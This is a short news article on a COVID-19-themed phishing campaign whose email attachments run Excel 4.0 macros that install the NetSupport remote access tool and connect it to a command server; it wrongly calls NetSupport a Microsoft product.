The Microsoft Security Intelligence team has announced that a massive phishing campaing is taking place, exploiting concerns related to COVID-19. It is no surprise that some scammers exploit a notorious event for their own game, as this had happened in the past when other notable events occurred.
Early reports infer that the campaign started almost two weeks ago. Attackers sent an email with a flashy title related to COVID-19 and urge the recipient to download and open an infected attachment.
In most of the reported cases, the title of the email was WHO COVID-19 SITUATION REPORT. Several attachments are present within the email, and it is inferred that they contain important data related to the spread of the coronavirus pandemic across the world.
Curious receivers who are interested in the content of the attachment will try to download and open it, doing what the attackers hoped that would happen. When the attachment is opened, it will automatically run a series of covert Excel 4.0 macros.
These macros will fetch, install, and run the NetSupport Remote Access Tool. While the tool is a legitimate remote access solution provided by Microsoft, malicious entities can repurpose it for nefarious deeds.
Acting in the background
One the NetSupport tool is up and running, it will attempt to connect to a pre-defined C2 server, which is used to send more commands to an infected machine, allowing the the attacker to run a series of executable files and scripts that can be used to monitor and harvest important data.
As always, the best way to avoid potential problems is to mark suspect emails as spam and send them to the Trash folder as fast as possible. Major organizations, regardless of their type, will never send sensitive data via emails, as press releases are the preferred alternative, allowing everyone to see the data in the open.